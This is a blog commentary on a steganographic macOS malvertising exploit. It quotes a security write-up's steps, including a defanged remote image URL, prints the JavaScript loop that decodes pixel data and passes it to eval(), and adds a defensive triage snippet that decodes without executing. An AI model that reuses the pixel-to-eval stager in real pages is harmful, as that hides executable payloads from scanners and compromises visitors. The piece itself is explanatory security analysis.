I’d been meaning to talk about the steganographic macOS exploit for a while. It’s interesting, but doesn’t really seem to warrant the amount of press it got. The TL;DR for it seems to be, “This is a clever hack that lets the sorts of exploit you saw all over the place five years ago pop back up briefly.”

That is, all it does is hide some code that would’ve been fingerprinted as an attack. You still have to download something stupid (afaict) to be compromised.

Let’s hit the high points from the security blog post:

Here’s how the exploit operates:

  • Create a Canvas object (this enables the use of the HTML5 Canvas API in order to interact with images and their underlying data.)
  • Grab the image located at: hxxp://s.ad-pixel.com/sscc.jpg
  • Define a function that checks if a specific font family is supported in the browser.
  • Check if Apple fonts are supported. If not, then do nothing.
  • If so, then loop through the underlying data in the image file. Each loop reads a pixel value and translates it into an alphanumeric character.
  • Add the newly extracted character to a string.
  • Execute the code in the string.

...

All of the landing pages have been observed to force the download of a file named AdobeFlashPlayerInstaller.iso

And here’s the secret code in action that reads from the image and pushes it into an eval:

image['onload'] = function () {
    ctx['drawImage'](image, 0x0, 0x0);
    var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);
    for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {
        rs += String['fromCharCode'](o['data'][p + 0x2]);
    }
    eval(rs);
};

That should do it for you. It treats the image as a data stream, decodes some characters, and evals them. Well, duh.
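For anyone triaging an image like this, the same pixel walk can be done statically, returning the string for inspection instead of handing it to eval. This is an added example, not code from the original post or the quoted blog; the function names are hypothetical and both byte arrays are constructed samples standing in for what getImageData would return.

```javascript
'use strict';
// Added example: decode the pixel-channel string for inspection. No eval().

// Same walk as the loop above: RGBA data, 4 bytes per pixel, one channel read
// per pixel (offset 2 = blue). `count` is the number of pixels to read.
function extractChannelText(rgba, count, channel = 2) {
  if (!Number.isInteger(channel) || channel < 0 || channel > 3) {
    throw new RangeError('channel must be 0..3');
  }
  const available = Math.floor(rgba.length / 4);
  const n = Math.min(count, available); // never index past the buffer
  let text = '';
  for (let px = 0; px < n; px++) {
    text += String.fromCharCode(rgba[px * 4 + channel]);
  }
  return text;
}

// Share of decoded characters that are printable ASCII or common whitespace.
function printableRatio(text) {
  if (text.length === 0) return 0;
  let ok = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d) ok++;
  }
  return ok / text.length;
}

// Hypothetical triage helper: returns the decoded text and two signals.
function triageImageData(rgba, count = 0x4b) {
  const text = extractChannelText(rgba, count);
  return {
    text,
    printable: printableRatio(text),
    shortRead: text.length < count, // image held fewer pixels than requested
  };
}

// Constructed sample: six pixels whose blue bytes spell the inert text "SAMPLE".
const SAMPLE_RGBA = new Uint8ClampedArray([
  200, 180, 83, 255,  200, 180, 65, 255,  200, 180, 77, 255,
  200, 180, 80, 255,  200, 180, 76, 255,  200, 180, 69, 255,
]);
// Constructed contrast: blue bytes with no text structure.
const NOISE_RGBA = new Uint8ClampedArray([
  10, 20, 3, 255,  10, 20, 250, 255,  10, 20, 17, 255,  10, 20, 130, 255,
]);

console.log(triageImageData(SAMPLE_RGBA));
console.log(triageImageData(NOISE_RGBA));
```

A channel that decodes to almost entirely printable text is the cue to read the string, not run it.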

Question: Why do browsers still allow eval?

(Okay, there’s probably something where on-demand loading with require, once transpiled (and don’t get me started on transpiled code (which I use all the time professionally, true) or I’ll get out my old man stick and scare you off of my lawn), calls eval, but it seems we could distinguish between libraries loaded and eval’d and strings created on the client so that we could at least get rid of this low-hanging fruit.)

As the blog author says…

Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

That’s really all we’re doing… we’re using an image for encoding a payload, and security folks hadn’t thought to sniff those yet. The rest still has to trick you into opening something you didn’t ask for before you’re compromised. That is, there are other checks to prevent immediate failure.

Btw: This is why you have to turn off “Open ‘safe’ files after downloading” in Safari. You can be made to download files, and you don’t want to hand them automatically to another security issue.

This is a natural progression. Not really much to see or learn here past that.
